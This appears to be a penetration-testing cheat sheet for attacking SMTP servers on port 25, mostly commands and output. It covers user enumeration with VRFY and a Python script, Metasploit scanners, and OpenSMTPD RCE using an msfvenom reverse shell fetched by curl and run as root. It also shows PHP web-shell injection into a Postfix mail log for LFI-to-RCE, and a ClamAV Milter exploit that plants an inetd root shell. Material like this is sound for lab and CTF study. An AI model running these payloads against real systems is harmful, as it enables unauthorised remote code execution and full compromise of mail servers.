Skip to content

smtp 25

What is SMTP?

Server Connection

$ nc -nvC $ip 25
$ telnet $ip 25

VRFY root
EXPN

SMTP Commands

$ helo admin
$ mail from:<>
$ rcpt to:<nobody>
$ data
hades
.

Scanning Vul

$ nmap $ip -p 25 --script=smtp-*
$ sudo msfconsole -q -x "setg RHOSTS $ip;
use auxiliary/scanner/smtp/smtp_enum; run;
use auxiliary/scanner/smtp/smtp_relay; run;
use auxiliary/scanner/smtp/smtp_version; run;
exit"

Scripting

python3 smtp-vrfy.py <username>
#!/usr/bin/python3

import socket
import sys

if len(sys.argv) != 2:
    print("Usage: python3 sys.argv[0] <username>")
    sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect(('192.168.11.131',25))

banner = s.recv(1024)

print (banner)

s.send('VRFY ' + sys.argv[1] + '\r\n')
result = s.recv(1024)

print(result)

s.close()

OpenSMTPD < 6.6.1 - rce

https://www.exploit-db.com/exploits/47984

msfvenom -p linux/x86/shell_reverse_tcp LHOST=ip LPORT=25 -f elf > shell.elf
sudo python3 -m http.server 80
python3 47984.py ip 25 'curl ip/shell.elf -o /tmp/shell'
python3 47984.py ip 25 'chmod +x /tmp/shell'
python3 47984.py ip 25 '/tmp/shell'
sudo nc -nvlp 25                     
listening on [any] 25 ...
connect to [ip] from (UNKNOWN) [ip] 57356
id
uid=0(root) gid=0(root) groups=0(root)

LFI to rce

WINTERMUTE: 1 - Walkthrough

==> Postfix mail log: /var/log/mail.log

$ nc -nC ip 25
220 straylight ESMTP Postfix (Debian/GNU)
mail from: "hades <?php system($_GET['cmd']); ?> hades"
250 2.1.0 Ok
rcpt to: "root@localhost"
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
.
250 2.0.0 Ok: queued as D4E985515
quit
221 2.0.0 Bye

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock'

https://www.exploit-db.com/exploits/34896

ClamAV Milter 0.92.2

https://www.exploit-db.com/exploits/4761

perl 4761.pl ip
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking ip...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Mon, 26 Jul 2021 09:42:48 -0400; (No UCE/UBE) logging access from: [ip](FAIL)-ip]
250-localhost.localdomain Hello [ip], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 16QDgmnb004808 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
$ nc -nv ip 31337 
(UNKNOWN) [ip] 31337 (?) open
id
uid=0(root) gid=0(root) groups=0(root)